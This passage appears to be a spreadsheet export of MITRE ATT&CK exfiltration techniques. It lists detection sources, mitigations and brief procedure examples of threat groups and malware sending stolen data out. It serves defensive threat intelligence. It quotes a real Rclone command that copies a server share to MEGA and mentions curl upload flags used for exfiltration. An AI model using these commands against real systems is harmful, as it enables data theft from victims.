Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network.(Citation: TechNet Firewall Design)
Restrict File and Directory Permissions
Use access control lists on cloud storage systems and objects. 
User Account Management
Configure user permissions groups and roles for access to cloud storage.(Citation: Microsoft Azure Storage Security, 2019) Implement strict Identity and Access Management (IAM) controls to prevent access to storage solutions except for the applications, users, and services that require access.(Citation: Amazon S3 Security, 2019) Ensure that temporary access tokens are issued rather than permanent credentials, especially when access is being granted to entities outside of the internal security boundary.(Citation: Amazon  AWS Temporary Security Credentials)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has sent locally staged files with collected credentials to C2 servers using cURL.(Citation: Cisco Talos Intelligence Group)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can directly download cloud user data such as OneDrive files.(Citation: AADInternals Documentation)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) uses the &lt;code&gt;curl -s -L -o&lt;/code&gt; command to exfiltrate archived data to a URL.(Citation: 20 macOS Common Tools and Techniques)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has exfiltrated its collected data from the infected machine to the C2, sometimes using the MIME protocol.(Citation: Cybereason Chaes Nov 2020) 
FrameworkPOS
[FrameworkPOS](https://attack.mitre.org/software/S0503) can use DNS tunneling for exfiltration of credit card data.(Citation: SentinelOne FrameworkPOS September 2019)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) connects to a predefined domain on port 443 to exfil gathered information.(Citation: Symantec Hydraq Jan 2010)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641) can exfiltrate credentials over the network via UDP.(Citation: ESET Kobalos Feb 2021) 
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has used a .NET tool named dog.exe to exiltrate information over an e-mail account.(Citation: Talos PoetRAT April 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.
File Access
Monitor files viewed in isolation that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Data Loss Prevention
Data loss prevention can detect and block sensitive data being uploaded via web browsers.
Filter Network Traffic
Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network. 
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. 
Network Segmentation
Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network.(Citation: TechNet Firewall Design)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.(Citation: Volexity SolarWinds)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
Rclone
[Rclone](https://attack.mitre.org/software/S1040) can exfiltrate data over SFTP or HTTPS via WebDAV.(Citation: Rclone)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may exfiltrate data to a cloud storage service rather than over their primary command and control channel.
File Access
Monitor for files being accessed to exfiltrate data to a cloud storage service rather than over their primary command and control channel.
Network Connection Creation
Monitor for newly constructed network connections to cloud services associated with abnormal or non-browser processes.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Monitor for cloud storages for data exfiltration. 
&lt;h4&gt;Analytic 1 - Suspicious Data Exfil&lt;/h4&gt;
&lt;code&gt;suspicious_exfil = filter network_traffic where (httpHost = "dropbox.com" or httpHost = "box.com" or httpHost = "drive.google.com" or httpHost = "mega.io" or httpHost = "mediafire.com")&lt;/code&gt;
Restrict Web-Based Content
Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services.
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the [Rclone](https://attack.mitre.org/software/S1040) command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.(Citation: DFIR Conti Bazar Nov 2021)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.(Citation: ESET Lazarus Jun 2020)(Citation: ClearSky Lazarus Aug 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has exfiltrated stolen data to OneDrive accounts.(Citation: NCC Group Chimera January 2021)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has exfiltrated victim data to cloud storage service accounts.(Citation: TrendMicro Confucius APT Feb 2018)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used the megacmd tool to upload stolen files from a victim network to MEGA.(Citation: TrendMicro EarthLusca 2022)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has exfiltrated stolen data to the MEGA file sharing site.(Citation: CrowdStrike Carbon Spider August 2021)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has exfiltrated data to file sharing sites, including MEGA.(Citation: Microsoft HAFNIUM March 2020)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used cloud services, including OneDrive, for data exfiltration.(Citation: Microsoft POLONIUM June 2022)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has exfiltrated stolen files and data to actor-controlled Blogspot accounts.(Citation: Talos Kimsuky Nov 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has exfiltrated data to Google Drive.(Citation: Bitdefender LuminousMoth July 2021)
POLONIUM
[POLONIUM](https://attack.mitre.org/groups/G1005) has exfiltrated stolen data to [POLONIUM](https://attack.mitre.org/groups/G1005)-owned OneDrive and Dropbox accounts.(Citation: Microsoft POLONIUM June 2022) 
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exfiltrated stolen data to Dropbox.(Citation: Trend Micro DRBControl February 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used WebDAV to upload stolen USB files to a cloud drive.(Citation: Symantec Waterbug Jun 2019) [Turla](https://attack.mitre.org/groups/G0010) has also exfiltrated stolen files to OneDrive and 4shared.(Citation: ESET ComRAT May 2020)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated stolen victim data to various cloud storage providers.(Citation: Mandiant FIN12 Oct 2021) 
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has exfiltrated stolen data to Dropbox.(Citation: Zscaler APT31 Covid-19 October 2020)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) can upload data to dedicated per-victim folders in Dropbox.(Citation: MSTIC Nobelium Toolset May 2021)
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.(Citation: Checkpoint IndigoZebra July 2021)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can send files from a victim's machine to Dropbox.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
CreepyDrive
[CreepyDrive](https://attack.mitre.org/software/S1023) can use cloud services including OneDrive for data exfiltration.(Citation: Microsoft POLONIUM June 2022)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) has exfiltrated stolen data to Dropbox.(Citation: ESET Crutch December 2020)
Empire
[Empire](https://attack.mitre.org/software/S0363) can use Dropbox for data exfiltration.(Citation: Github PowerShell Empire)
HAMMERTOSS
[HAMMERTOSS](https://attack.mitre.org/software/S0037) exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.(Citation: FireEye APT29)
Octopus
[Octopus](https://attack.mitre.org/software/S0340) has exfiltrated data to file sharing sites.(Citation: ESET Nomadic Octopus 2018)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can send collected data to cloud storage services such as PCloud.(Citation: Malwarebytes RokRAT VBA January 2021)(Citation: Volexity InkySquid RokRAT August 2021)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) can use a file exfiltration tool to upload specific files to Dropbox.(Citation: Bitdefender Naikon April 2021)	 
Rclone
[Rclone](https://attack.mitre.org/software/S1040) can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.(Citation: Rclone)(Citation: DFIR Conti Bazar Nov 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Review logs for SaaS services, including Office 365 and Google Workspace, to detect the configuration of new webhooks.
Command Execution
Monitor executed commands and arguments that may exfiltrate data to a webhook as a malicious command and control channel. Additionally, monitor commands that may create new webhook configurations in SaaS services - for example, `gh webhook forward` in Github or `mgc subscriptions create` in Office 365.(Citation: Github CLI Create Webhook)(Citation: Microsoft CLI Create Subscription)
File Access
Monitor for files being accessed to exfiltrate data to a webhook as a malicious command and control channel.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Data Loss Prevention
Data loss prevention can be detect and block sensitive data being uploaded to web services via web browsers.
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Review logs for SaaS services, including Office 365 and Google Workspace, to detect the configuration of new webhooks or other features that could be abused to exfiltrate data.
Command Execution
Monitor executed commands and arguments that may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.
File Access
Monitor for files being accessed by an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel.
Network Connection Creation
Monitor for newly constructed network connections to web and cloud services associated with abnormal or non-browser processes.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Data Loss Prevention
Data loss prevention can be detect and block sensitive data being uploaded to web services via web browsers.
Restrict Web-Based Content
Web proxies can be used to enforce an external network communication policy that prevents use of unauthorized external services.
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used Cloudflare services for data exfiltration.(Citation: Mandiant APT41)
APT28
[APT28](https://attack.mitre.org/groups/G0007) can exfiltrate data over Google Drive.(Citation: TrendMicro Pawn Storm Dec 2020) 
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used the Telegram API `sendMessage` to relay data on compromised devices.(Citation: Google Iran Threats October 2021)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has exfiltrated files using web services.(Citation: KISA Operation Muzabi)
DropBook
[DropBook](https://attack.mitre.org/software/S0547) has used legitimate web services to exfiltrate data.(Citation: BleepingComputer Molerats Dec 2020)
ngrok
[ngrok](https://attack.mitre.org/software/S0508) has been used by threat actors to configure servers for data exfiltration.(Citation: MalwareBytes Ngrok February 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by abnormal or untrusted hosts. 
Network Traffic Flow
Monitor and analyze network flows associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider analyzing newly constructed network connections that are sent or received by untrusted hosts, unexpcted hardware devices, or other uncommon data flows.
Encrypt Sensitive Information
Ensure that all wired and/or wireless traffic is encrypted appropriately. Use best practices for authentication protocols, such as Kerberos, and ensure web traffic that may contain credentials is protected by SSL/TLS.
User Account Management
In cloud environments, ensure that users are not granted permissions to create or modify traffic mirrors unless this is explicitly required.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection
File Access
Monitor for abnormal access to files (i.e. .pdf, .docx, .jpg, etc.), especially sensitive documents, through the use of automated processing after being gathered during Collection.
Network Connection Creation
Monitor for newly constructed network connections associated with processes performing collection activity, especially those involving abnormal/untrusted hosts. 
Network Traffic Content
Monitor network traffic content for evidence of data exfiltration, such as gratuitous or anomalous outbound traffic containing collected data. Consider correlation with process monitoring and command lines associated with collection and exfiltration.
Network Traffic Flow
Monitor and analyze network flows associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider analyzing newly constructed network connections that are sent or received by untrusted hosts, unexpected hardware devices, or other uncommon data flows.
Script Execution
Monitor for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Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors collected information via [Empire](https://attack.mitre.org/software/S0363), which was automatically sent back to the adversary's C2.(Citation: Talos Frankenstein June 2019)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used modules that automatically upload gathered documents to the C2 server.(Citation: ESET Gamaredon June 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has performed  frequent and scheduled data exfiltration from compromised networks.(Citation: Microsoft NICKEL December 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has configured tools to automatically send collected files to attacker controlled servers.(Citation: ATT Sidewinder January 2021)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has used a copy function to automatically exfiltrate sensitive data from air-gapped systems using USB storage.(Citation: TrendMicro Tropic Trooper May 2020)	
Attor
[Attor](https://attack.mitre.org/software/S0438) has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server.(Citation: ESET Attor Oct 2019)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) exfiltrates collected files automatically over FTP to remote servers.(Citation: F-Secure Cosmicduke)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) has automatically exfiltrated stolen files to Dropbox.(Citation: ESET Crutch December 2020)
Doki
[Doki](https://attack.mitre.org/software/S0600) has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.(Citation: Intezer Doki July 20)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) can automatically exfiltrate gathered SSH credentials.(Citation: ESET Windigo Mar 2014)
Empire
[Empire](https://attack.mitre.org/software/S0363) has the ability to automatically send collected data back to the threat actors' C2.(Citation: Talos Frankenstein June 2019)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to automatically exfiltrate files under a specified directory.(Citation: ESET LightNeuron May 2019)
Machete
[Machete](https://attack.mitre.org/software/S0409)’s collected files are exfiltrated automatically to remote servers.(Citation: ESET Machete July 2019) 
OutSteel
[OutSteel](https://attack.mitre.org/software/S1017) can automatically upload collected files to its C2 server.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Peppy
[Peppy](https://attack.mitre.org/software/S0643) has the ability to automatically exfiltrate files and keylogs.(Citation: Proofpoint Operation Transparent Tribe March 2016)
Rover
[Rover](https://attack.mitre.org/software/S0090) automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. [Rover](https://attack.mitre.org/software/S0090) also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.(Citation: Palo Alto Rover)
ShimRatReporter
[ShimRatReporter](https://attack.mitre.org/software/S0445) sent collected system and network information compiled into a report to an adversary-controlled C2.(Citation: FOX-IT May 2016 Mofang)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) can automatically exfiltrate collected documents to the C2 server.(Citation: Talos Promethium June 2020)(Citation: Bitdefender StrongPity June 2020)
TINYTYPHON
When a document is found matching one of the extensions in the configuration, [TINYTYPHON](https://attack.mitre.org/software/S0131) uploads it to the C2 server.(Citation: Forcepoint Monsoon)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to manage an automated queue of egress files and commands sent to its C2.(Citation: Kaspersky TajMahal April 2019)
USBStealer
[USBStealer](https://attack.mitre.org/software/S0136) automatically exfiltrates collected files via removable media when an infected device connects to an air-gapped victim machine after initially being connected to an internet-enabled victim machine. (Citation: ESET Sednit USBStealer 2014)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.
File Access
Monitor files viewed in isolation that may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel.
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Data Loss Prevention
Data loss prevention can detect and block sensitive data being sent over unencrypted protocols.
Filter Network Traffic
Enforce proxies and use dedicated servers for services such as DNS and only allow those systems to communicate over respective ports/protocols, instead of all systems within a network. 
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. 
Network Segmentation
Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network.(Citation: TechNet Firewall Design)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.(Citation: Mandiant APT41)
APT32
[APT32](https://attack.mitre.org/groups/G0050)'s backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.(Citation: ESET OceanLotus Mar 2019)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used FTP to exfiltrate files (separately from the C2 channel).(Citation: Symantec Elfin Mar 2019)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has sent stolen payment card data to remote servers via HTTP POSTs.(Citation: Trend Micro FIN6 October 2019)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used FTP to exfiltrate collected data.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has exfiltrated data over FTP separately from its primary C2 channel over DNS.(Citation: Palo Alto OilRig Oct 2016)
Thrip
[Thrip](https://attack.mitre.org/groups/G0076) has used WinSCP to exfiltrate data from a targeted organization over FTP.(Citation: Symantec Thrip June 2018)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated victim information using FTP.(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) has routines for exfiltration over SMTP, FTP, and HTTP.(Citation: Talos Agent Tesla Oct 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: SentinelLabs Agent Tesla Aug 2020)
BITSAdmin
[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload files from a compromised host.(Citation: Microsoft BITSAdmin)
Brave Prince
Some [Brave Prince](https://attack.mitre.org/software/S0252) variants have used South  Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.(Citation: McAfee Gold Dragon)
CORALDECK
[CORALDECK](https://attack.mitre.org/software/S0212) has exfiltrated data in HTTP POST headers.(Citation: FireEye APT37 Feb 2018)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) uses HTTP to send data to the C2 server.(Citation: ESET Carbon Mar 2017)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can send victim data via FTP with credentials hardcoded in the script.(Citation: Check Point APT35 CharmPower January 2022)
Cherry Picker
[Cherry Picker](https://attack.mitre.org/software/S0107) exfiltrates files over FTP.(Citation: Trustwave Cherry Picker)
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) has used the &lt;code&gt;curl --upload-file&lt;/code&gt; command to exfiltrate data over HTTP.(Citation: Unit42 CookieMiner Jan 2019)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.(Citation: F-Secure Cosmicduke)
Dok
[Dok](https://attack.mitre.org/software/S0281) exfiltrates logs of its execution stored in the &lt;code&gt;/tmp&lt;/code&gt; folder over FTP using the &lt;code&gt;curl&lt;/code&gt; command.(Citation: hexed osx.dok analysis 2019) 
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has used FTP to exfiltrate reconnaissance data out.(Citation: Medium KONNI Jan 2020)
Kessel
[Kessel](https://attack.mitre.org/software/S0487) can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.(Citation: ESET ForSSHe December 2018)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has used [ftp](https://attack.mitre.org/software/S0095) for exfiltration.(Citation: Talos PoetRAT April 2020)
Rclone
[Rclone](https://attack.mitre.org/software/S1040) can exfiltrate data over FTP or HTTP, including HTTP via WebDAV.(Citation: Rclone)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.(Citation: Kaspersky ProjectSauron Full Report)
WindTail
[WindTail](https://attack.mitre.org/software/S0466) has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.(Citation: objective-see windtail2 jan 2019)
ccf32
[ccf32](https://attack.mitre.org/software/S1043) can upload collected data and files to an FTP server.(Citation: Bitdefender FunnyDream Campaign November 2020)
ftp
[ftp](https://attack.mitre.org/software/S0095) may be used to exfiltrate data separate from the main command and control protocol.(Citation: Microsoft FTP)(Citation: Linux FTP)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may steal data by exfiltrating it over an existing command and control channel.
File Access
Monitor for suspicious files (i.e. .pdf, .docx, .jpg, etc.) viewed in isolation that may steal data by exfiltrating it over an existing command and control channel.
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
Note: Network Analysis frameworks such as Zeek can be used to capture, decode, and alert on TCP network connection creation.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Data Loss Prevention
Data loss prevention can detect and block sensitive data being sent over unencrypted protocols.
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary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command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used its Cloudflare services C2 channels for data exfiltration.(Citation: Mandiant APT41)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors collected information via [Empire](https://attack.mitre.org/software/S0363), which sent the data back to the adversary's C2.(Citation: Talos Frankenstein June 2019)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) exfiltrated data from a compromised host to actor-controlled C2 servers.(Citation: ClearSky Lazarus Aug 2020)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors uploaded stolen files to their C2 servers.(Citation: McAfee Honeybee)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used the XServer backdoor to exfiltrate data.(Citation: FoxIT Wocao December 2019)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that exfiltrates data over the C2 channel.(Citation: FireEye Clandestine Fox)
APT32
[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has exfiltrated data using the already opened channel with its C&amp;C server.(Citation: ESET OceanLotus Mar 2019)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has exfiltrated stolen victim data through C2 communications.(Citation: FBI FLASH APT39 September 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used [Cobalt Strike](https://attack.mitre.org/software/S0154) C2 beacons for data exfiltration.(Citation: NCC Group Chimera January 2021) 
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has exfiltrated stolen files to its C2 server.(Citation: TrendMicro Confucius APT Aug 2021)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used Web shells and [HTRAN](https://attack.mitre.org/software/S0040) for C2 and to exfiltrate data.(Citation: Cybereason Soft Cell June 2019)
Gamaredon Group
A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can transfer collected files to a hardcoded C2 server.(Citation: Palo Alto Gamaredon Feb 2017)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) exfiltrated data over its C2 channel.(Citation: Zscaler Higaisa 2020)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations.(Citation: Mandiant Operation Ke3chang November 2014)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has exfiltrated data over its C2 channel.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has exfiltrated data and files over a C2 channel through its various tools and malware.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has exfiltrated data over its C2 channel.(Citation: CISA AA21-200A APT40 July 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malware that exfiltrates stolen data to its C2 server.(Citation: Kaspersky LuminousMoth July 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used C2 infrastructure to receive exfiltrated data.(Citation: Reaqta MuddyWater November 2017)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has sent system information to its C2 server using HTTP.(Citation: ESET Telebots Dec 2016)	
Stealth Falcon
After data is collected by [Stealth Falcon](https://attack.mitre.org/groups/G0038) malware, it is exfiltrated over the existing C2 channel.(Citation: Citizen Lab Stealth Falcon May 2016)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has exfiltrated domain credentials and network enumeration information over command and control (C2) channels.(Citation: CrowdStrike Grim Spider May 2019)(Citation: Mandiant FIN12 Oct 2021)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has exfiltrated files via the Dropbox API C2.(Citation: Zscaler APT31 Covid-19 October 2020)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) exfiltrates data over the same channel used for C2.(Citation: ESET Sednit Part 2)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has sent victim data to its C2 servers.(Citation: BlackBerry Amadey 2020)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has exfiltrated collected host information to a C2 server.(Citation: CISA AppleJeus Feb 2021)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can exfiltrate files via the C2 channel.(Citation: Malwarebytes Kimsuky June 2021)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) exfiltrates collected information from its r1.log file to the external C2 server. (Citation: Cybereason Astaroth Feb 2019)
Attor
[Attor](https://attack.mitre.org/software/S0438) has exfiltrated data over the C2 channel.(Citation: ESET Attor Oct 2019)
AuTo Stealer
[AuTo Stealer](https://attack.mitre.org/software/S1029) can exfiltrate data over actor-controlled C2 servers via HTTP or TCP.(Citation: MalwareBytes SideCopy Dec 2021)
BACKSPACE
Adversaries can direct [BACKSPACE](https://attack.mitre.org/software/S0031) to upload files to the C2 Server.(Citation: FireEye APT30)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can exfiltrate data over the C2 channel.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021) 
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has sent user and system information to a C2 server via HTTP POST requests.(Citation: NHS UK BLINDINGCAN Aug 2020)(Citation: US-CERT BLINDINGCAN Aug 2020)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) has exfiltrated data over its C2 channel.(Citation: Volexity InkySquid BLUELIGHT August 2021)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) can upload files from a victim's machine over the C2 channel.(Citation: CheckPoint Bandook Nov 2020)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) exfiltrates data over its C2 channel.(Citation: McAfee Bankshot)
Bisonal
 [Bisonal](https://attack.mitre.org/software/S0268) has added the exfiltrated data to the URL over the C2 channel.(Citation: Talos Bisonal Mar 2020) 
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) uploads files and data from a compromised host over the existing C2 channel.(Citation: Checkpoint IndigoZebra July 2021)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can send collected data in JSON format to C2.(Citation: Google EXOTIC LILY March 2022)
CallMe
[CallMe](https://attack.mitre.org/software/S0077) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)
Cannon
[Cannon](https://attack.mitre.org/software/S0351) exfiltrates collected data over email via SMTP/S and POP3/S C2 channels.(Citation: Unit42 Cannon Nov 2018)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has exfiltrated data via HTTP to already established C2 servers.(Citation: Prevx Carberp March 2011)(Citation: Trusteer Carberp October 2010)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can upload files over the C2 channel.(Citation: ClearSky Lebanese Cedar Jan 2021) 
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can exfiltrate gathered data to a hardcoded C2 URL via HTTP POST.(Citation: Check Point APT35 CharmPower January 2022)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) can exfiltrate collected data via C2.(Citation: ESET Gelsemium June 2021)
CreepySnail
[CreepySnail](https://attack.mitre.org/software/S1024) can connect to C2 for data exfiltration.(Citation: Microsoft POLONIUM June 2022)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can exfiltrate stolen information over its C2.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
Crutch
[Crutch](https://attack.mitre.org/software/S0538) can exfiltrate data over the primary C2 channel (Dropbox HTTP API).(Citation: ESET Crutch December 2020)
